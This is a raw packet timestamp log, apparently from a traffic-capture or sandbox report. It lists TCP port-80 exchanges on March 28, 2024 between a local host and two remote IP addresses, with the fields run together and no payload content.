                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.352807999 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.474343061 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.474380016 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.474419117 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.474529028 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.592199087 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.592226028 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.592237949 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.592317104 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.717386007 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.717464924 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.717505932 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.717519045 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.762850046 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.837691069 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.837712049 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.837727070 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.837814093 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.960824966 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.960841894 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.960901022 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.960913897 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.960953951 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:40.960992098 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.078846931 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.078866005 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.078879118 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.078972101 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.122266054 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.202090979 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.202109098 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.202122927 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.202159882 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.247188091 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.325082064 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.325107098 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.325124979 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.325248957 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:41.372210979 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491389036 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491420031 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491434097 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491446972 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491461039 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491475105 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491487026 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491499901 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491512060 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491520882 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491525888 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491545916 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491558075 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491561890 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491574049 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:42.491602898 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150804996 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150824070 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150860071 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150873899 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150907993 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150917053 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150943995 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150943995 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150959015 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.150985956 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.151026964 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.151041031 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.151052952 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.151065111 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.151074886 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.151077986 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.151098967 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.151139975 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.155683994 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.155704021 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.155785084 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.395692110 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.395710945 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.395725012 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.395742893 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.395755053 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.395767927 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.395787954 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:44.395834923 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124663115 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124687910 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124702930 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124743938 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124814987 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124850988 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124852896 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124912024 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124939919 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.124958992 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.168997049 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.706554890 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.706572056 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:45.706636906 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.311980963 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.312041044 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.312079906 CET4970780192.168.2.681.94.159.197
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.537071943 CET804970781.94.159.197192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543411970 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543436050 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543452024 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543467045 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543481112 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543530941 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543534040 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543553114 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543567896 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.543567896 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:46.590864897 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399421930 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399482965 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399496078 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399569988 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399583101 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399688959 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399702072 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399719000 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399719000 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399763107 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399820089 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:47.399867058 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.817998886 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818030119 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818044901 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818113089 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818134069 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818183899 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818327904 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818454981 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818494081 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818581104 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818672895 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818716049 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818763971 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818828106 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818866968 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818871975 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818911076 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.818948984 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.822508097 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.822575092 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.822668076 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.822730064 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.822798967 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:48.822840929 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:49.539818048 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:49.539838076 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:49.540009022 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775661945 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775691986 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775705099 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775717020 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775748014 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775796890 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775851011 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775984049 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.775984049 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776071072 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776084900 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776098013 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776139021 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776192904 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776206017 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776242971 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776271105 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.776319027 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780378103 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780441046 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780493975 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780513048 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780574083 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780590057 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780616045 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780664921 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780700922 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780708075 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780735016 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780776024 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780822992 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780859947 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780873060 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.780903101 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:50.825239897 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021044016 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021069050 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021090984 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021141052 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021168947 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021195889 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021249056 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021281958 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021330118 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.021331072 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.075364113 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264362097 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264386892 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264429092 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264446974 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264544010 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264569044 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264596939 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264642000 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.264646053 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.309765100 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507704020 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507720947 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507761002 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507781982 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507795095 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507833004 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507842064 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507917881 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507930040 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.507968903 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752118111 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752137899 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752206087 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752223969 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752270937 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752288103 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752288103 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752341986 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752381086 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.752384901 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.794084072 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.995774031 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.995825052 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.995837927 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.995850086 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.995932102 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.995975018 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.995975018 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.996037960 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.996051073 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:51.996088028 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.040294886 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.040338039 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.040348053 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.040353060 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.040400982 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.596287966 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.596313000 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.596326113 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.596338987 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.596355915 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.596385002 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.596420050 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719329119 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719343901 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719356060 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719367981 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719412088 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719424963 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719436884 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719480038 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719492912 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719505072 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719505072 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719505072 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.719548941 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:52.762859106 CET4970880192.168.2.6189.232.22.59
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:53.282550097 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:53.282578945 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:53.282598972 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:53.282610893 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:53.282624960 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:53.282636881 CET8049708189.232.22.59192.168.2.6
                                                                                                                                                                                                                                      Mar 28, 2024 17:50:53.282720089 CET8049708189.232.22.59192.168.2.6
